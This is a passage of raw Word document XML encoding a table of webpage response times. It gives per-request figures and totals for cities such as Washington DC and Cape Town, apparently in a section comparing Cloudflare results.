            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A69862F"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768</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D4D82E0"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732</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21A2C85C"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742</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CED23FF"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723</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="308ADEC8"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6202</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="20D69CD8" w14:textId="77777777" w:rsidTr="001C3F72">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15A6A167" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Washington DC, United States</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="348AB3D3"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490</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48218376"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590</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48BD2F97"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502</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CD79903"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234</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1615C3D0"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524</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C05AD1F"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512</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60CF5EB1"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222</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E70A3BD"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711</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="124651AB"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299</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EB7D5F4"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258</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D97BA65"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4342</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="71719F2A" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="644BD060" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B85DEC5"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254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69C01AFC"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981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09D81336"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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4165B40B"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75B8D106"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4E37DAE0"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4FD49B6A"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2A5B1BC2"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0444AAAF"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5954C0CF" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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237598BF" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="0FD460BD" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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EF40EE9"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Cloudflare</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11660" w:type="dxa"/>
            <w:gridSpan w:val="11"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63ECD5D6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Webpage Response (s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="310D4AF3" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="618FFF03"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City, Country</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C36F373"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1326690F"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="439915AD"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62E174A6"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E44E63C"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34417526"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E37F544"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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53C90FF6"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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63763D89"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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A23A38F"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Request 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54468947" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="1F0E9CC0" w14:textId="77777777" w:rsidTr="001C3F72">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6601242B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Cape Town, South Africa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54D561EF"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818</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="191ADF46"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1104</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36F444EA"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705</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54049F98"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691</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="506B7B36"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713</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46629D29"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741</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5033FFDE"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1148</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75EBB68C"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761</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EC6FCF6"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790</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
